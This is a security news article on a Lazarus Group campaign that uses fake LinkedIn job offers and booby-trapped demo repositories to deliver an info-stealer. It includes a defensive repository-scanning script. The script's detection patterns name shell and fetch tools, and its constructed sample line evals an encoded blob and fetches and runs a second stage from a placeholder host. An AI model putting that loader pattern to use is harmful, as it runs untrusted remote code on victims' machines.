Lazarus Group Targets LinkedIn Users with Fake Job Offers and Cross-Platform Malware

Bitdefender Labs has uncovered a new cyber-espionage campaign tied to the North Korea-linked Lazarus Group, and it leans heavily on social engineering. Attackers are approaching professionals on LinkedIn with fake job opportunities meant to steal credentials and install malware. It’s another example of how threat actors use trusted platforms, and people’s career goals, to get a foot in the door.

It starts with a message that looks like a real recruiter outreach. The target is offered a remote, part-time role that seems to match their background. The tone is friendly and professional, and it often feels personal enough to earn a reply. Once the target engages, the attacker asks for personal details as part of the “hiring process,” building credibility while gathering information that can be used later.

How the Fake LinkedIn Job Offer Delivers Malware

Next, the attacker shares a repository that supposedly contains a “minimum viable product” (MVP). Alongside the code is a document with technical questions. The target is told they need to run the demo project to answer those questions, which adds pressure and makes the request feel like a normal skills assessment.

On the surface, the project appears functional. Under the hood, Bitdefender researchers found heavily obfuscated scripts designed to hide what’s really happening. When the demo runs, those scripts pull down additional malicious code from a third-party source, helping the attackers slip past basic checks and deliver the real payload with less scrutiny.
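One practical defender-side check that follows from this is a pre-run triage of any recruiter-shared repository before it is opened in an isolated environment. The script below is an added illustration, not code from Bitdefender's report or from the campaign: it flags script files that decode and evaluate an embedded blob, reach out for a second stage, or carry long high-entropy strings, and lists the URLs they reference. The file extensions, entropy threshold, and the constructed loader sample are assumptions.

```python
import base64
import math
import random
import re
from pathlib import Path

# Heuristics for the loader pattern described above (decode-and-eval, remote second stage).
DECODE_EVAL = re.compile(r"\b(eval|exec|new\s+Function|atob|b64decode)\s*\(")
REMOTE_FETCH = re.compile(
    r"\b(fetch|XMLHttpRequest|https?\.get|axios|requests\.get|urllib|curl|wget|child_process|subprocess)\b")
URL = re.compile(r"https?://[^\s'\"`)]+")
LONG_BLOB = re.compile(r"['\"]([A-Za-z0-9+/=]{200,})['\"]")

def shannon_entropy(s: str) -> float:
    """Bits per character; base64 of packed or encrypted data sits near 5-6."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def scan_text(text: str):
    """Return (findings, urls) for the contents of one script file."""
    findings = []
    if DECODE_EVAL.search(text):
        findings.append("decode-and-eval")
    if REMOTE_FETCH.search(text):
        findings.append("remote-fetch")
    if any(shannon_entropy(m.group(1)) > 4.5 for m in LONG_BLOB.finditer(text)):
        findings.append("high-entropy-blob")
    return findings, sorted(set(URL.findall(text)))

def scan_repo(root, exts=(".js", ".ts", ".py", ".sh")):
    """Walk a checked-out repository and report files that deserve a manual look."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.suffix in exts and "node_modules" not in path.parts:
            findings, urls = scan_text(path.read_text(errors="ignore"))
            if findings:
                report[str(path)] = (findings, urls)
    return report

# Constructed sample (not from the campaign): a loader that decodes an embedded
# blob, evals it, then pulls a second stage from a placeholder remote host.
_rand = random.Random(7)
BLOB = base64.b64encode(bytes(_rand.getrandbits(8) for _ in range(240))).decode()
SUSPICIOUS_SAMPLE = (
    'const _0x1a = "' + BLOB + '";\n'
    'eval(Buffer.from(_0x1a, "base64").toString());\n'
    'fetch("http://example.invalid/stage2.js").then(r => r.text()).then(eval);\n'
)
CLEAN_SAMPLE = "def add(a, b):\n    return a + b\n"
```

Run `scan_repo("/path/to/clone")` on the checked-out project; any file it reports should be read by hand before the demo is ever executed.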

Cross-Platform Info-Stealer Targets Crypto and Login Data

The payload is a cross-platform information stealer that can run on Windows, macOS, and Linux. Once it’s active, it hunts for high-value data, including crypto-related browser extensions, saved login credentials, and sensitive files that may contain financial or internal business information.

The malware then quietly exfiltrates what it collects to a command-and-control server, keeping noise low to reduce the chance of detection. After that, it downloads and runs a Python script to enable follow-on activity, which can expand access and increase the impact of the compromise.

What makes this campaign especially risky is the blend of persuasion and technical misdirection. LinkedIn is a familiar, trusted platform, and many people are open to new roles, so they’re more likely to engage and follow “assessment” instructions without realizing the risk.

Security teams recommend treating unsolicited job offers with extra caution, especially when they involve running code or downloading files. Repositories shared by unknown recruiters should be considered suspicious by default. If you need to review a project, use an isolated environment, verify the employer independently, and confirm the recruiter’s identity through trusted channels.

Ultimately, the takeaway is simple: even reputable platforms can be used as an entry point. Staying skeptical, and slowing down before running anything, can prevent a bad day from turning into a breach.